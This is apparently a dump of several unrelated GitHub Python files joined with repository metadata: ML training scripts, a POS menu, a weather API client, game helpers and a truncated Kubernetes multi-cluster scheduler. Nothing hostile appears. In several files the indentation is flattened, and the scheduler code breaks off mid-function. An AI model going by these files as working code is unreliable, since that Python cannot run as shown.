"Validation Accuracy: {:.3f}".format(validation_accuracy/len(valid_loader)))
if valid_loss < min_validation_loss:
print('Validation loss decreased {:.4f}--->{:.4f} saving model'.format(min_validation_loss, valid_loss))
min_validation_loss = valid_loss
torch.save(model.state_dict(), 'FasionMNIST.pt')
print()
print("Total time to train {}".format(time.time()-start))
# model.cpu()
# images, labels = next(iter(test_loader))
# output = model(images[0])
# helper.view_classify(images[0], torch.exp(output), version='Fashion')
plt.plot(train_losses, label='training loss')
plt.plot(valid_losses, label='validation loss')
plt.legend(frameon=False)
model.load_state_dict(torch.load('FasionMNIST.pt'))
test_loss = 0.0
class_correct = list(0. for i in range(10))
class_total = list(0. for i in range(10))
model.eval() # prep model for evaluation
with torch.no_grad():
for data, target in test_loader:
# forward pass: compute predicted outputs by passing inputs to the model
data=data.cuda()
target=target.cuda()
output = model(data)
# calculate the loss
loss = criterion(output, target)
# update test loss
test_loss += loss.item()
# convert output probabilities to predicted class
_, pred = torch.max(output, 1)
# compare predictions to true label
correct = np.squeeze(pred.eq(target.data.view_as(pred)))
# calculate test accuracy for each object class
for i in range(len(target)):
label = target.data[i]
class_correct[label] += correct[i].item()
class_total[label] += 1
# calculate and print avg test loss
test_loss = test_loss/len(test_loader)
print('Test Loss: {:.6f}\n'.format(test_loss))
for i in range(10):
if class_total[i] > 0:
print('Test Accuracy of %5s: %2d%% (%2d/%2d)' % (
str(i), 100 * class_correct[i] / class_total[i],
np.sum(class_correct[i]), np.sum(class_total[i])))
else:
        print('Test Accuracy of %5s: N/A (no training examples)' % (str(i)))
print('\nTest Accuracy (Overall): %2d%% (%2d/%2d)' % (
100. * np.sum(class_correct) / np.sum(class_total),
np.sum(class_correct), np.sum(class_total)))
``` |
{
"source": "007mathur/BreastCancerClassification",
"score": 3
} |
#### File: 007mathur/BreastCancerClassification/cancer_pso.py
```python
from nn import relu, sigmoid, tanh, softmax
from nn.model import Model
from nn.layers import Layer
from nn.losses import CrossEntropyLoss, BinaryCrossEntropyLoss
from nn.pipeline import DataLoader
import numpy as np
import pandas as pd
import time
t = time.process_time()
from sklearn.datasets import load_breast_cancer
cancer = load_breast_cancer()
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
df_cancer = pd.DataFrame(np.c_[cancer['data'], cancer['target']], columns = np.append(cancer['feature_names'], ['target']))
all_data = df_cancer.values
all_data = scaler.fit_transform(all_data)  # apply the 0-1 scaling; fit() alone does not transform the data
np.random.shuffle(all_data)
split = int(0.9 * all_data.shape[0])
x_train = all_data[:split, 0:-1]
x_test = all_data[split:, 0:-1]
y_train = all_data[:split, -1]
y_test = all_data[split:, -1]
def one_hot(y, depth=10):
y_1hot = np.zeros((y.shape[0], depth))
y_1hot[np.arange(y.shape[0]), y] = 1
return y_1hot
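# Illustrative only: one_hot(np.array([0, 1]), depth=2) returns [[1., 0.], [0., 1.]].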
y_train = one_hot(y_train.astype('int'), depth=2)
y_test = one_hot(y_test.astype('int'), depth=2)
def accuracy(y, y_hat):
y = np.argmax(y, axis=1)
y_hat = np.argmax(y_hat, axis=1)
return np.mean(y==y_hat)
model = Model()
model.add_layer(Layer(30, 7, relu))
model.add_layer(Layer(7, 2, softmax))
model.compile(CrossEntropyLoss, DataLoader, accuracy, batches_per_epoch=(x_train.shape[0]//16)+1, n_workers=12)
model.fit(X=x_train, y=y_train, epochs=100)
y_hat = model.predict(x_test)
print('Accuracy on test:', accuracy(y_test, y_hat))
elapsed_time = time.process_time() - t
print("Elapsed Time:", elapsed_time)
``` |
{
"source": "007rohitSaini/commandline_pos",
"score": 3
} |
#### File: 007rohitSaini/commandline_pos/manager.py
```python
import connect
import getpass  # getpass is already included in the base Python library, so no need to install it through pip
def main():
# print menu
    help = '''
    Enter Signup to create a new login account.
    Enter ShowStock to show the stock database.
    Enter ShowLogin to display login credentials.
    Enter Update to edit the stock table.
    Enter Sale to show the sale table.
    Enter Help to see this text again.
    Enter Close to exit.
    '''
print(help)
    # get continuous input while true
while True:
init = input(':-> ')
if init.lower() == 'signup':
connect.sign()
elif init.lower() == 'showstock':
connect.show_db()
elif init.lower() == 'showlogin':
connect.show_login()
elif init.lower() == 'sale':
connect.show_sale()
elif init.lower() == 'update':
connect.update_Stock()
elif init.lower() == 'help':
print(help)
elif init.lower() == 'close':
break
else:
print('Input error, Try again')
if __name__ == '__main__':
main()
``` |
{
"source": "007root/weather",
"score": 3
} |
#### File: 007root/weather/weather_api.py
```python
import csv
import requests
from datetime import datetime
TOKEN = ''
CITY_CSV = 'city.csv'
SKYCON = {
"CLEAR_DAY": "晴天",
"CLEAR_NIGHT": "晴夜",
"PARTLY_CLOUDY_DAY": "多云",
"PARTLY_CLOUDY_NIGHT": "多云",
"CLOUDY": "阴",
"RAIN": "雨",
"SNOW": "雪",
"WIND": "风",
"HAZE": "雾霾沙尘"}
WIND_SPEED = {
0: ["1", "无风", "烟直上"],
1: ["1-5", "软风", "烟稍斜"],
2: ["6-11", "轻风", "树叶响"],
3: ["12-19", "微风", "树枝晃"],
4: ["20-28", "和风", "灰尘起"],
5: ["29-38", "清风", "水起波"],
6: ["39-49", "强风", "大树摇"],
7: ["50-61", "劲风", "步难行"],
8: ["62-74", "大风", "树枝折"],
9: ["75-88", "烈风", "烟囱毁"]}
def get_location(province, city=None, zone=None):
with open(CITY_CSV, 'r') as csvfile:
cityread = csv.reader(csvfile)
flag = 0
ret = None
for i in cityread:
if province in i[0]:
flag += 1
if flag == 1:
ret = i
if city and city in i[1]:
if zone:
if zone in i[2]:
ret = i
else:
continue
else:
ret = i
else:
continue
assert ret, "Not found %s. Please enter again" % province
return ret
def get_wind_speed(speed):
    # Map a wind speed (km/h) to its [level, range, name, description]
    if speed <= 1:
        return WIND_SPEED.get(0)
    for k, v in WIND_SPEED.items():
        if k == 0:
            continue  # level 0 is handled above; leave the module-level table unmodified
        start, end = v[0].split('-')
        if int(start) <= int(speed) <= int(end):
            return [k] + v
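# Illustrative example (not from the original source): get_wind_speed(30) falls in the
# "29-38" range, so it returns [5, "29-38", "清风", "水起波"].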
def get_realtime_weather(province, city=None, zone=None):
"""
get_weather(province, city=None, zone=None)
"""
LOCATION = get_location(province, city, zone)
coordinate = ','.join(LOCATION[-2:])
API = 'https://api.caiyunapp.com/v2/%s/%s/realtime.json?unit=metric:v2' % (TOKEN, coordinate)
weather = requests.get(API)
weather = weather.json()
server_time = float(weather.get('server_time'))
server_time = datetime.fromtimestamp(server_time)
speed = weather.get('result').get('wind').get('speed')
skycon = SKYCON.get(weather.get('result').get('skycon'))
temperature = weather.get('result').get('temperature')
ultraviolet = weather.get('result').get('ultraviolet').get('desc')
region = LOCATION[:2]
speed_msg = get_wind_speed(speed)
result = """
%s
北京时间: %s
当前天气: %s
紫外线 : %s
当前气温: %s℃
当前风速: %skm/h, %s级, %s""" % (','.join(region), server_time, skycon,
ultraviolet, temperature,
speed, speed_msg[0],
','.join(speed_msg[-2:]))
return result
def get_forecast_weather(province, city=None, zone=None):
"""
get_weather(province, city=None, zone=None)
"""
LOCATION = get_location(province, city, zone)
coordinate = ','.join(LOCATION[-2:])
    API = 'https://api.caiyunapp.com/v2/%s/%s/forecast.json?unit=metric:v2' % (TOKEN, coordinate)  # use the configured TOKEN like the realtime endpoint
weather = requests.get(API)
weather = weather.json()
server_time = float(weather.get('server_time'))
server_time = datetime.fromtimestamp(server_time)
daily = weather.get('result').get('daily')
speed = daily.get('wind')[0].get('avg').get('speed')
skycon = SKYCON.get(daily.get('skycon')[0].get('value'))
temperature = daily.get('temperature')[0]
temp_avg = temperature.get('avg')
temp_min = temperature.get('min')
temp_max = temperature.get('max')
ultraviolet = daily.get('ultraviolet')[0].get('desc')
pm25 = daily.get('pm25')[0].get('max')
sun = daily.get('astro')[0]
sun_set = sun.get('sunset').get('time')
sun_rise = sun.get('sunrise').get('time')
region = LOCATION[:2]
speed_msg = get_wind_speed(speed)
result = """北京时间: %s
%s
明天天气概况
日出: %s
日落: %s
天气: %s
pm2.5 : %s
紫外线 : %s
气温: 最高 %s℃ 最低 %s℃ 平均 %s℃
风速: %skm/h, %s级, %s""" % (server_time, ','.join(region), sun_rise, sun_set, skycon, pm25,
ultraviolet, temp_max, temp_min, temp_avg,
speed, speed_msg[0],
','.join(speed_msg[-2:]))
return result
if __name__ == '__main__':
the_weather = get_realtime_weather('北京', '朝阳')
print(the_weather)
``` |
{
"source": "007sya/Project2021",
"score": 3
} |
#### File: utils/download_data/datasets.py
```python
import os
from typing import List
import pandas as pd
from utils.download_data import data_dtypes as dtypes
from utils.download_data import download_safegraph_data
from utils.file_utils import file_type
from utils.path_utils import path_utils, paths
def get_brand_info_dataset():
for f in path_utils.list_files_recursively(paths.brand_info):
df = pd.read_csv(f)
return df
def get_core_poi_by_city(city, region=None, save_data=True):
file_name = os.path.join(paths.processed_datasets,
city,
"core_poi.csv")
if os.path.isfile(file_name):
return pd.read_csv(file_name, encoding="utf-8")
chunks = []
for f in path_utils.list_files_recursively(paths.core_poi):
        for chunk in pd.read_csv(f, chunksize=10_000):
            # keep only rows matching the requested city (and region, if given)
            chunk = chunk[chunk["city"] == city]
            if region is not None:
                chunk = chunk[chunk["region"] == region]
            chunks.append(chunk)
final_df = pd.concat(chunks)
if save_data:
path_utils.create_dir_if_necessary(file_name)
final_df.to_csv(file_name, encoding="utf-8", index=False)
return final_df
def filter_census_df(path: str, columns: List[str], cbgs: List[str]):
""" Filters census .csv given the columns and the cbgs
"""
dfs = []
# read the file per parts because it is 1gb large
for chunk in pd.read_csv(path,
encoding="utf-8",
chunksize=10000,
dtype=dtypes.census_dtypes):
chunk["census_block_group"] = (chunk["census_block_group"]
.astype(int).astype(str))
chunk = chunk[chunk["census_block_group"].isin(cbgs)]
chunk = chunk[columns]
dfs.append(chunk.copy())
# concat the filtered chunks
return pd.concat(dfs)
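# Illustrative usage only (hypothetical column and cbg values): keep two columns for a
# handful of block groups without loading the whole census file into memory, e.g.
#   filter_census_df(path, ["census_block_group", "B01001e1"], ["482012231001", "482012231002"])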
def get_census_metadata():
files = [f for f in path_utils.list_files_recursively(paths.open_census_dir)
if file_type.is_census_metadata(f)]
for file in files:
if "description" in file:
break
return pd.read_csv(file)
def get_lastest_home_pannel_summary(cbgs=None, donwload_most_recent=True):
if donwload_most_recent:
path = download_safegraph_data.download_lastest_home_pannel_summary()
if cbgs is not None:
return filter_census_df(path, ["census_block_group",
"number_devices_residing"],
cbgs)
return pd.read_csv(path, encoding="utf-8")
# %%
```
#### File: utils/list_utils/list_utils.py
```python
from utils.path_utils import path_utils
def listify(list_or_value):
""" Given a list or a value transforms it to a list
Arguments:
list_or_value (str or list): List or a value
Returns:
A list
"""
if isinstance(list_or_value, list):
return list_or_value
else:
return [list_or_value]
def unlistify(list_:list):
""" Given a list it returns the list or the value if the length is 1
Arguments:
list_ (list): List of values
Returns:
A list if the length is greater than 1 if not
returns the first element
"""
if len(list_) == 1:
return list_[0]
else:
return list_
``` |
{
"source": "007vasy/JDP-WordCount",
"score": 4
} |
#### File: 007vasy/JDP-WordCount/word_freq.py
```python
import os
import sys
import re
from docopt import docopt
def openFileAndReadIn(fileName):
text = ""
try:
f = open(fileName, 'r')
except IOError:
print("ERROR Could not read file:{}".format(fileName))
sys.exit()
with f:
text = f.read()
f.close()
return text
def cleanTextAndMakeAList(text):
text = re.sub('[^a-zA-Z]+', ' ', text)
text = text.lower()
return text.split()
def countWordsFreqAndReturnListOfTuples(list_of_words):
freq_counter = {}
for w in list_of_words:
if w not in freq_counter:
freq_counter[w] = 1;
else:
freq_counter[w] += 1
freq_of_words = []
for key,val in freq_counter.items():
freq_of_words.append((val,key))
return freq_of_words
def filterListOfWords(freq_of_words,count_threshold,stop_words):
temp_list = []
if count_threshold != None:
for (val, key) in freq_of_words:
if val > count_threshold and key not in stop_words :
temp_list.append((val,key))
else:
temp_list = freq_of_words
return temp_list
def printOutWordFreqResult(filtered_freq_of_words):
print("----")
filtered_freq_of_words.sort(reverse=True)
for (val, key) in filtered_freq_of_words:
print('{}:{}'.format(key,val))
print("----")
return
def filePathFeedback(file_path):
return("{} is the choosen file path".format(file_path))
def minCountFeedback(count_threshold):
return("_{}_ is the threshold (Anything equal or less will be hidden)".format(count_threshold))
def excludedWordsFeedback(stop_words_file):
return("{} is the file containing the excluded words".format(stop_words_file))
if __name__ == '__main__':
print("####")
arguments = docopt(__doc__, version='1.0')
if arguments['<file_path>']:
analysis_f_name = arguments['<file_path>']
print(filePathFeedback(analysis_f_name))
analysed_text = openFileAndReadIn(analysis_f_name)
count_threshold = None
stop_words_file = ""
stop_words = []
if arguments['<count_threshold>']:
count_threshold = int(arguments['<count_threshold>'])
print(minCountFeedback(count_threshold))
if arguments['<stop_words_file>']:
stop_words_file = arguments['<stop_words_file>']
print(excludedWordsFeedback(stop_words_file))
stop_words = openFileAndReadIn(stop_words_file).split()
list_of_words = cleanTextAndMakeAList(analysed_text)
freq_of_words = countWordsFreqAndReturnListOfTuples(list_of_words)
filtered_freq_of_words = filterListOfWords(freq_of_words,count_threshold,stop_words)
printOutWordFreqResult(filtered_freq_of_words)
else:
print(arguments)
print("####")
``` |
{
"source": "007xuyang/Myblog",
"score": 2
} |
#### File: Myblog/blog/models.py
```python
from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
class Tag(models.Model):
class Meta:
app_label = 'blog'
verbose_name = '标签'
verbose_name_plural = '标签'
name = models.CharField(max_length=40)
def __str__(self):
return self.name
class Category(models.Model):
class Meta:
app_label = 'blog'
verbose_name = '分类目录'
verbose_name_plural = '分类目录'
name = models.CharField(max_length=40)
def __str__(self):
return self.name
class Post(models.Model):
class Meta:
app_label = 'blog'
verbose_name = '文章'
verbose_name_plural = '文章'
    # Author
    author = models.ForeignKey(User)
    # Title
    title = models.CharField(max_length=200)
    # Body text
    text = models.TextField()
    # Tags
    tags = models.ManyToManyField(Tag)
    # Category
    category = models.ForeignKey(Category)
    # Click count
    click = models.IntegerField(default=0)
    # Creation time
    created_date = models.DateTimeField(default=timezone.now)
    # Publication time
    published_date = models.DateTimeField(blank=True, null=True)
def publish(self):
self.published_date = timezone.now()
self.save()
def __str__(self):
return self.title
class Comment(models.Model):
class Meta:
app_label = 'blog'
verbose_name = '评论'
verbose_name_plural = '评论'
author = models.CharField(max_length=20)
email = models.EmailField()
text = models.TextField()
created_date = models.DateTimeField(default=timezone.now)
post = models.ForeignKey(Post)
def __str__(self):
return '{0}: {1}'.format(self.author, self.post.title)
class Evaluate(models.Model):
class Meta:
app_label = 'blog'
verbose_name = '评分'
verbose_name_plural = '评分'
ip = models.CharField(max_length=40)
evaluate = models.IntegerField()
post = models.ForeignKey(Post)
def __str__(self):
return '{0}: {1}'.format(self.ip, self.evaluate)
class Page(models.Model):
class Meta:
app_label = 'blog'
verbose_name = '页面'
verbose_name_plural = '页面'
    # Author
    author = models.ForeignKey(User)
    # Title
    title = models.CharField(max_length=200)
    # Body text
    text = models.TextField()
    # Display order
    porder = models.IntegerField(default=0)
    # Creation time
    created_date = models.DateTimeField(default=timezone.now)
    # Publication time
    published_date = models.DateTimeField(blank=True, null=True)
def publish(self):
self.published_date = timezone.now()
self.save()
def __str__(self):
return self.title
``` |
{
"source": "00-ab/willows",
"score": 4
} |
#### File: willows/display/dd_curses.py
```python
import curses
import json
import pprint
TABLE_SYM_ONE = "I"
TABLE_SYM_TWO = "*"
TABLE_WIDTH = 41
TABLE_HEIGHT = 9
TABLE_COL_ONE = 20
def display( game ):
"""
Accepts a dance-game JSON object
and passes it through the wrapper to _display,
which does the real drawing.
"""
game = curses.wrapper( _display, game )
return game
def _display( win, game0 ):
stdscr = win
game_data = json.loads( game0 )
curses.init_pair( 1, curses.COLOR_RED, curses.COLOR_BLACK )
curses.init_pair( 2, curses.COLOR_RED, curses.COLOR_BLACK )
curses.init_pair( 3, curses.COLOR_RED, curses.COLOR_BLACK )
curses.init_pair( 4, curses.COLOR_RED, curses.COLOR_BLACK )
choice = None
while( choice != 'q' ):
_print_stats( stdscr, 1, 1, "PLAYER ONE", game_data['0'] )
_print_stats( stdscr, 1, 51, "PLAYER TWO", game_data['1'])
# insert map display here
strng = "Turn " + str(game_data['game']['turn']) + ". Press any key."
win.addstr( curses.LINES-1, 1, strng )
win.getch()
for x in range(curses.COLS-1):
win.addch( curses.LINES-1, x, " " )
# Get inputs
win.addstr( curses.LINES-1, 1, "Player Zero, input move. " )
choice = chr( win.getch() )
game_data["0choice"] = choice
for x in range(curses.COLS-1):
win.addch( curses.LINES-1, x, " " )
win.addstr( curses.LINES-1, 1, "Player One, input move. " )
choice = chr( win.getch() )
game_data["1choice"] = choice
for x in range(curses.COLS-1):
win.addch( curses.LINES-1, x, " " )
game1 = json.dumps( game_data )
return game1
def _print_stats( win, y, x, title, player ):
d = json.dumps( player )
win.addstr( y, x+1, title )
    # Draw the border of the table
win.vline( y+1, x, TABLE_SYM_TWO, TABLE_HEIGHT )
win.vline( y+1, x+TABLE_COL_ONE, TABLE_SYM_TWO, TABLE_HEIGHT )
win.vline( y+1, x-1+TABLE_WIDTH, TABLE_SYM_TWO, TABLE_HEIGHT )
win.hline( y+1, x, TABLE_SYM_ONE, TABLE_WIDTH )
win.hline( y+3, x, TABLE_SYM_ONE, TABLE_WIDTH )
win.hline( y+5, x, TABLE_SYM_ONE, TABLE_WIDTH )
win.hline( y+7, x, TABLE_SYM_ONE, TABLE_WIDTH )
win.hline( y+9, x, TABLE_SYM_ONE, TABLE_WIDTH )
# Print the information
win.addstr( y+2, x+2, 'EARTH/WILL' )
win.addstr( y+4, x+2, 'AIR/CALM' )
win.addstr( y+6, x+2, 'FIRE/PASSION' )
win.addstr( y+8, x+2, 'WATER/BALANCE' )
strng = "{0}/{1}".format(player['earth'], player['will'] )
win.addstr( y+2, x+2+TABLE_COL_ONE, strng )
strng = "{0}/{1}".format(player['air'], player['calm'] )
win.addstr( y+4, x+2+TABLE_COL_ONE, strng )
strng = "{0}/{1}".format(player['fire'], player['heat'] )
win.addstr( y+6, x+2+TABLE_COL_ONE, strng )
strng = "{0}/{1}".format(player['water'], player['balance'] )
win.addstr( y+8, x+2+TABLE_COL_ONE, strng )
if __name__ == '__main__':
    curses.wrapper(_display, game_temp)  # note: game_temp is not defined in this module; supply a dance-game JSON string
```
#### File: willows/display/dd_narrator.py
```python
def read( script, flag ):
    """
    For a script delineated into sections headed by flags starting with "## ",
    finds the section with the passed-in flag and returns it.
    Ignores lines starting with single #s. See /script/example .
    """
    for index, line in enumerate( script ):
        if line[0:3] == "## " and line[3:] == flag:
            text = []
            toRead = index + 1
            while not script[ toRead ][0:3] == "## ":
                #ignore comments
                if script[ toRead ][0:1] == "#":
                    toRead += 1
                #strip out blank lines at end of passages
                #(I like having those lines in cause it makes scripts pretty.)
                elif script[ toRead ] == "" and script[ toRead + 1 ][0:3] == "## ":
                    toRead += 1
                #add true lines to output
                else:
                    text.append( script[ toRead ] )
                    toRead += 1
            return text
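# A minimal sketch (hypothetical content) of the flag-delimited script format read() expects,
# e.g. loaded from /script/example with something like open(path).read().splitlines():
#
#   ## grapple
#   You are locked arm in arm.
#   ## shortRange
#   You circle just within striking distance.
#
# read(script, "grapple") would then return ["You are locked arm in arm."].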
def genFlagList( dance ):
"""
Accepts a dance object and returns a list of flags.
This is akin to reading or parsing the condition of the dance game.
The flags can then be read using read().
"""
flagList = []
#parse distance
distance = dance["game"]["d"]
    if distance == 0:
        flagList.append( "grapple" )
    elif abs(distance) == 1:
        flagList.append( "shortRange" )
    elif abs(distance) == 2:
        flagList.append( "midRange" )
    elif abs(distance) == 3:
        flagList.append( "longRange" )
    elif abs(distance) >= 4:
        flagList.append( "far" )
    return flagList
def narrate( dance, script ):
"""
This accepts a dance, gets all relevant flags, and returns their corresponding scripts.
In your games, you may wish to narrate flags in a certain order,
so this may be too blunt for you.
"""
# in fact this might be too blunt for everyone...
# how do I make it more versatile?
narrative = []
flagList = genFlagList( dance )
for flag in flagList:
narrative += read( script, flag )
return narrative
```
#### File: willows/tools/choose.py
```python
import sys # for sys. exit
def choose( *args ):
"""
Accepts a list of options,
then traps the player
until it types one of them.
"""
# First prepare to print the list of options.
string = "["
# args.append( "quit" )
for choice in enumerate(args):
string += choice[1]
if choice[0] != len(args) - 1:
string += "/"
string += "] "
# Then get the choice.
valid = 0
while valid == 0:
        player_choice = input( string )  # assumes Python 3; use raw_input under Python 2
if player_choice in args:
valid = 1
else:
print( "Invalid response." )
if player_choice == "quit":
sys.exit()
return player_choice
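# Minimal usage sketch (hypothetical options): loops until one of the listed words is typed.
if __name__ == '__main__':
    print( choose( "attack", "defend", "quit" ) )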
```
#### File: willows/tools/die.py
```python
import random
import math
def d( sides ):
result = math.floor( random.random() * sides )
return result
def die_test( sides, tries ):
    # roll the die `tries` times and tally how often each face comes up
    array = [0] * sides
    total = 0
    for iterations in range( 0, tries ):
        roll = int( d( sides ) )
        array[ roll ] += 1
        total += roll
    print( total )
    print( array )
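# A minimal usage sketch (assumed parameters): tally 1000 rolls of a six-sided die.
if __name__ == '__main__':
    die_test( 6, 1000 )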
"""
LlL
"""
``` |
{
"source": "00ahui/mck8s",
"score": 2
} |
#### File: mck8s/multi-cluster-scheduler/utils.py
```python
from kubernetes import client, config
from kubernetes.client.rest import ApiException
from collections import defaultdict
from pint import UnitRegistry
from prometheus_api_client import PrometheusConnect
import subprocess
import operator
import os
import math
import pandas as pd
# Load k8s contexts
config.load_kube_config()
timeout = 30
ureg = UnitRegistry()
Q_ = ureg.Quantity
# Memory units
ureg.define('kmemunits = 1 = [kmemunits]')
ureg.define('Ki = 1024 * kmemunits')
ureg.define('Mi = Ki^2')
ureg.define('Gi = Ki^3')
ureg.define('Ti = Ki^4')
ureg.define('Pi = Ki^5')
ureg.define('Ei = Ki^6')
# cpu units
ureg.define('kcpuunits = 1 = [kcpuunits]')
ureg.define('m = 1/1000 * kcpuunits')
ureg.define('k = 1000 * kcpuunits')
ureg.define('M = k^2')
ureg.define('G = k^3')
ureg.define('T = k^4')
ureg.define('P = k^5')
ureg.define('E = k^6')
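# Illustrative examples of how these units are used below (the values are
# hypothetical): Q_('2').to('m') normalizes a 2-core kubelet CPU string to
# 2000 m (millicores), and Q_('8053064Ki') keeps kubelet memory strings in
# Ki so they can be subtracted before being reduced to plain floats.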
def findPossibleReplacementClusters(cluster, original_clusters, app_cpu_request, app_memory_request):
nearest_clusters = findNearestClusters(cluster, original_clusters)
possible_clusters = []
for c in nearest_clusters:
check_possibility = checkClusterPossibility(c, app_cpu_request, app_memory_request)
if check_possibility == True:
possible_clusters.append(c)
return possible_clusters
def findEligibleReplacementClusters(cluster, original_clusters, app_cpu_request, app_memory_request, replicas):
print("Looking for clusters near to " + cluster)
nearest_clusters = findNearestClusters(cluster, original_clusters)
print("Nearest clusters ....", nearest_clusters)
eligible_clusters = []
for c in nearest_clusters:
check_eligibility = checkClusterEligibility(c, app_cpu_request, app_memory_request, replicas)
if check_eligibility == True:
eligible_clusters.append(c)
return eligible_clusters
def findPossibleClusters(clusters, app_cpu_request, app_memory_request):
print("==================== Processing possible clusters ==========================")
print(clusters)
possible_clusters_list = []
for cluster in clusters:
is_possible = checkClusterPossibility(cluster, app_cpu_request, app_memory_request)
if is_possible == True:
possible_clusters_list.append(cluster)
else:
possible_replacements = findPossibleReplacementClusters(cluster, clusters, app_cpu_request, app_memory_request)
print("Replacement clusters ...............", possible_replacements)
if len(possible_replacements) > 0:
possible_clusters_list.append(possible_replacements[0])
return possible_clusters_list
def findEligibleClusters(fogapp_locations, possible_clusters, override_replicas_new, fogapp_cpu_request, fogapp_memory_request):
eligible_clusters = []
for cluster in possible_clusters:
replicas = int(override_replicas_new[cluster])
# is_eligible = checkClusterEligibility(cluster, app_cpu_request, app_memory_request, replicas)
# The maximum number of replicas the cluster can host
maximum_replicas = getMaximumReplicas(cluster, fogapp_cpu_request, fogapp_memory_request)
if maximum_replicas > replicas:
dict = {}
dict['name'] = cluster
dict['max_replicas'] = maximum_replicas
dict['replicas'] = replicas
dict['overflow'] = 0
eligible_clusters.append(dict)
else:
dict = {}
dict['name'] = cluster
dict['max_replicas'] = maximum_replicas
dict['replicas'] = maximum_replicas
dict['overflow'] = replicas - maximum_replicas
eligible_clusters.append(dict)
temp_list = []
for cluster in eligible_clusters:
temp_list.append(cluster)
print("Possible list of clusters and overflow ....", temp_list)
temp_list_2 = []
for cluster in temp_list:
temp_list_2.append(cluster['name'])
temp_list_3 = list(set(fogapp_locations + temp_list_2))
total_overflow = 0
for cluster in temp_list:
total_overflow += cluster['overflow']
maximum_replicas = {}
for cluster in temp_list:
nearest_clusters = []
overflow = cluster['overflow']
# leftover = overflow
print("Overflow from ", cluster, overflow)
if overflow > 0:
nearest_clusters = findNearestClusters(cluster, temp_list_3)
print("List of nearest clusters ....", nearest_clusters)
# else:
# print("The cluster doesn't have overflow ....")
# break
# Distribute overflow to nearest clusters
if len(nearest_clusters) > 0:
for c in nearest_clusters:
# print("Overflow .................", overflow)
# if overflow > 0:
maximum_replicas[c] = getMaximumReplicas(c, fogapp_cpu_request, fogapp_memory_request)
print("Maximum replicas .....", maximum_replicas)
for cluster in temp_list:
nearest_clusters = []
overflow = cluster['overflow']
if overflow > 0:
nearest_clusters = findNearestClusters(cluster, temp_list_3)
# else:
# break
if len(nearest_clusters) > 0:
for c in nearest_clusters:
if cluster['overflow'] > 0:
if maximum_replicas[c] == 0:
cluster['overflow'] = cluster['overflow']
# break
elif maximum_replicas[c] > cluster['overflow']:
dict = {}
dict['name'] = c
dict['replicas'] = cluster['overflow']
dict['overflow'] = 0
eligible_clusters.append(dict)
maximum_replicas[c] = maximum_replicas[c] - cluster['overflow']
cluster['overflow'] = 0
# break
else:
dict = {}
dict['name'] = c
dict['replicas'] = maximum_replicas[c]
dict['overflow'] = 0
cluster['overflow'] = cluster['overflow'] - maximum_replicas[c]
eligible_clusters.append(dict)
maximum_replicas[c] = 0
eligible_clusters = (pd.DataFrame(eligible_clusters)
.groupby(['name'], as_index=False)
.agg({'replicas': 'sum', 'overflow': 'sum'})
.to_dict('r'))
return eligible_clusters
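# Illustrative walk-through of the overflow handling above: if a cluster is
# asked for 10 replicas but can only host 6, it is recorded with replicas=6
# and overflow=4; the 4 leftover replicas are then offered to its nearest
# clusters (per findNearestClusters) in latency order, each absorbing up to
# its own maximum capacity, and the rows are finally summed per cluster name
# with the pandas groupby so a cluster appearing twice ends up as one entry.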
def checkClusterEligibility(cluster, app_cpu_request, app_memory_request, replicas):
print("==================== Processing eligible clusters ==========================")
totalAvailableCPU, totalAvailableMemory, available_resources_per_node = compute_available_resources(cluster)
print("Available resources per node ..... for cluster", cluster, available_resources_per_node)
count = 0
for node in available_resources_per_node:
count += min(math.floor(node['cpu']/app_cpu_request), math.floor(node['memory']/app_memory_request))
print("Total number of replicas that can be scheduled ........... on", cluster, count)
#if count > replicas:
if count > replicas:
return True
else:
return False
def getAllocatableCapacity(cluster, app_cpu_request, app_memory_request, app_name, app_namespace):
print("Compute allocatable capacity ..............")
allocatable_capacity_per_node = computeAllocatableCapacity(cluster, app_name, app_namespace)
count = 0
for node in allocatable_capacity_per_node:
count += min(math.floor(node['cpu']/app_cpu_request), math.floor(node['memory']/app_memory_request))
return count
def getMaximumReplicas(cluster, app_cpu_request, app_memory_request):
print("Get the maximum number of replicas > 0 clusters can run ....")
totalAvailableCPU, totalAvailableMemory, available_resources_per_node = compute_available_resources(cluster)
count = 0
for node in available_resources_per_node:
count += min(math.floor(node['cpu']/app_cpu_request), math.floor(node['memory']/app_memory_request))
return count
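# Worked example of the count above (hypothetical numbers, assuming the app
# requests use the same units as the per-node figures, i.e. millicores and
# MiB): a node with 1500 CPU and 2048 memory free and an app requesting
# 500 / 512 contributes min(floor(1500/500), floor(2048/512)) = min(3, 4) = 3.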
def computeAllocatableCapacity(cluster, app_name, namespace):
total_allocatable_cpu = 0
total_allocatable_memory = 0
core_v1 = client.CoreV1Api(api_client=config.new_client_from_config(context=cluster))
allocatable_resources_per_node = []
try:
for node in core_v1.list_node(_request_timeout=timeout).items:
stats = {}
node_name = node.metadata.name
allocatable = node.status.allocatable
allocatabale_cpu = Q_(allocatable['cpu']).to('m')
allocatable_memory = Q_(allocatable['memory'])
total_allocatable_cpu += allocatabale_cpu
total_allocatable_memory += allocatable_memory
max_pods = int(int(allocatable["pods"]) * 1.5)
field_selector = ("status.phase!=Succeeded,status.phase!=Failed," +
"spec.nodeName=" + node_name)
# Calculate for all ns
node_cpu_request_all = 0
node_memory_request_all = 0
pods = core_v1.list_pod_for_all_namespaces(limit=max_pods,
field_selector=field_selector).items
cpureqs, memreqs = [], []
for pod in pods:
for container in pod.spec.containers:
res = container.resources
reqs = defaultdict(lambda: 0, res.requests or {})
cpureqs.append(Q_(reqs["cpu"]))
memreqs.append(Q_(reqs["memory"]))
node_cpu_request_all += sum(cpureqs)
node_memory_request_all += sum(memreqs)
# Calculate for the namespace
node_cpu_request_default = 0
node_memory_request_default = 0
# Get pods in the namespace
pods = core_v1.list_namespaced_pod(namespace=namespace, limit=max_pods,
field_selector=field_selector).items
cpureqs, memreqs = [], []
for pod in pods:
for container in pod.spec.containers:
res = container.resources
reqs = defaultdict(lambda: 0, res.requests or {})
cpureqs.append(Q_(reqs["cpu"]))
memreqs.append(Q_(reqs["memory"]))
node_cpu_request_default += sum(cpureqs)
node_memory_request_default += sum(memreqs)
# Exclude the resource request of other apps in the default namespace
# Calculate for the namespace other apps
node_cpu_request_default_other = 0
node_memory_request_default_other = 0
# Get pods of default ns
pods = core_v1.list_namespaced_pod(namespace=namespace, limit=max_pods,
field_selector=field_selector).items
cpureqs, memreqs = [], []
for pod in pods:
for container in pod.spec.containers:
if container.name != app_name:
res = container.resources
